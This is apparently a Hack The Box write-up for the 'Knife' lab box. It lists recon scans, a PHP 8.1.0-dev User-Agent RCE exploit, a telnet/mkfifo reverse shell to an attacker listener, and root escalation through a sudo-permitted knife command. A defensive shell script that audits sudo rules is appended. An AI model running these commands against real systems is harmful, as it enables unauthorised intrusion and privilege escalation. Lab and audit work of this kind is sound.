Knife - Hack The Box

Reconnaissance

  • Nmap
nmap -sS --open -p- --min-rate 5000 -vvv -n -Pn 10.10.10.242

  • Whatweb
whatweb http://10.10.10.242/

Exploitation

  • PHP 8.1.0-dev User Agent RCE
searchsploit php 8.1.0-dev

searchsploit -m php/webapps/49933.py
python3 49933.py

  • Send reverse shell
TF=$(mktemp -u);mkfifo $TF && telnet 10.10.16.7 9000 0<$TF | /bin/bash 1>$TF
nc -nlvp 9000

Post-exploitation

  • Check sudoers
sudo -l

  • Knife Sudoers
sudo knife exec -E 'exec "/bin/sh"'
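
  • Audit sudoers for code-executing tools (added example)
The defender's view of the sudoers finding above, as an added example that is not part of the original write-up: a POSIX shell function that reads `sudo -l` output and flags rules delegating a tool that can run arbitrary code, as knife does through `knife exec`. The RISKY list, the function names and the sample input are assumptions constructed for this example, and rules are assumed to fit on one line each.

```shell
#!/bin/sh
# Added example (not from the original write-up): audit `sudo -l` output for
# rules that delegate a tool able to run arbitrary code, such as knife.
# RISKY is an illustrative, non-exhaustive list (assumption).
RISKY="knife ruby python python3 perl bash sh vim find awk"

# audit_sudo_l: read `sudo -l` output on stdin and print
# "<PASSWD|NOPASSWD> <runas> <command path>" for every risky rule.
audit_sudo_l() {
    awk -v risky="$RISKY" '
    BEGIN { n = split(risky, r, " "); for (i = 1; i <= n; i++) bad[r[i]] = 1 }
    # Rule lines start with the run-as spec, e.g. "(root) NOPASSWD: /usr/bin/knife"
    /^[ \t]*\(/ {
        line = $0; sub(/^[ \t]*/, "", line)
        runas = line; sub(/\).*/, ")", runas)
        rest = line;  sub(/^\([^)]*\)[ \t]*/, "", rest)
        auth = "PASSWD"                       # sudo default: password required
        m = split(rest, cmds, /,[ \t]*/)
        for (j = 1; j <= m; j++) {
            cmd = cmds[j]
            # Tags (NOPASSWD:, SETENV:, ...) precede a command and stay in
            # effect for the commands that follow on the same rule.
            while (match(cmd, /^[A-Z_]+:[ \t]*/)) {
                tag = substr(cmd, 1, RLENGTH)
                if (tag ~ /^NOPASSWD:/) auth = "NOPASSWD"
                else if (tag ~ /^PASSWD:/) auth = "PASSWD"
                cmd = substr(cmd, RLENGTH + 1)
            }
            split(cmd, words, " ")
            path = words[1]; base = path; sub(/.*\//, "", base)
            if (path == "ALL" || (base in bad))
                printf "%s %s %s\n", auth, runas, path
        }
    }'
}

# Constructed sample input; user, host and paths are made up for the example.
sample_sudo_l() {
    cat <<'EOF'
Matching Defaults entries for deploy on host1:
    env_reset, mail_badpass

User deploy may run the following commands on host1:
    (root) NOPASSWD: /usr/bin/knife
    (root) /usr/bin/systemctl status nginx, NOPASSWD: /usr/bin/python3 /opt/report.py
    (ALL : ALL) ALL
EOF
}

sample_sudo_l | audit_sudo_l   # on a real host: sudo -l | audit_sudo_l
```

Any line tagged NOPASSWD for a tool that accepts code or spawns commands is equivalent to unrestricted root for that user; the usual fix is to remove the rule or replace it with a fixed-argument wrapper.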